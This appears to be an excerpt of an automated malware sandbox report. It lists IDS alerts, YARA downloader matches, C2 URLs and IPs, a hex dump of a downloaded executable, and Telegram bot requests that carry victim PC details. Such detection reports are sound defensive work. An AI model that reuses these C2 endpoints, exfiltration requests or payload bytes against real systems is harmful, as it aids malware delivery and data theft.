Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49920 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49986 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://amazonenviro.com/245_Aiymwhpjxsg

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1d140000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.25f299de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2c9b0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a03a8c6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2d020000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1cb10ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28fc0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.jphwmyiA.pif.24507b80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.jphwmyiA.pif.2a0399de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.jphwmyiA.pif.187dcca8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.28730ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1d99de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.jphwmyiA.pif.1a1da8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.3.jphwmyiA.pif.283edba0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.3451706486.000000002D020000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3451247424.000000001CB10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3451626441.000000001D140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3450918250.0000000028730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3450696077.000000002C9B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3452644011.0000000028FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 8_2_0284E72C InternetCheckConnectionA,

8_2_0284E72C

Source: global traffic

TCP traffic: 192.168.2.5:49989 -> 208.91.198.176:587

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKContent-Type: application/octet-streamLast-Modified: Tue, 07 Jan 2025 08:16:47 GMTAccept-Ranges: bytesETag: "65d1a17edc60db1:0"Server: Microsoft-IIS/8.5Date: Tue, 07 Jan 2025 12:25:00 GMTContent-Length: 1161216Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 d0 06 00 00 e4 0a 00 00 00 00 00 0c e8 06 00 00 10 00 00 00 f0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 12 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 07 00 6e 26 00 00 00 20 08 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 e8 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 57 07 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 c4 06 00 00 10 00 00 00 c6 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 48 08 00 00 00 e0 06 00 00 0a 00 00 00 ca 06 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 40 1f 00 00 00 f0 06 00 00 20 00 00 00 d4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 ec 36 00 00 00 10 07 00 00 00 00 00 00 f4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 6e 26 00 00 00 50 07 00 00 28 00 00 00 f4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 34 00 00 00 00 80 07 00 00 00 00 00 00 1c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 90 07 00 00 02 00 00 00 1c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 7c 00 00 00 a0 07 00 00 7e 00 00 00 1e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 00 1c 0a 00 00 20 08 00 00 1c 0a 00 00 9c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 40 12 00 00 00 00 00 00 b8 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2007/01/2025%20/%2023:15:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2007/01/2025%20/%2021:58:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2007/01/2025%20/%2022:17:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 208.91.198.176 208.91.198.176
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49831 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49848 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49807 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49886 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49904 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49813 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49733 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49872 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49802 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49843 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49896 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49913 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49914 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49866 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49996 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49912 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49968 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49879 -> 188.114.97.3:443

Source: global traffic

TCP traffic: 192.168.2.5:49989 -> 208.91.198.176:587

Source: global traffic	HTTP traffic detected: GET /image.exe HTTP/1.1Connection: Keep-AliveAccept: /Accept-Language: en-chUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: 147.124.216.113
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49795 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49871 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49887 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113
Source: unknown	TCP traffic detected without corresponding DNS query: 147.124.216.113

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2007/01/2025%20/%2023:15:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
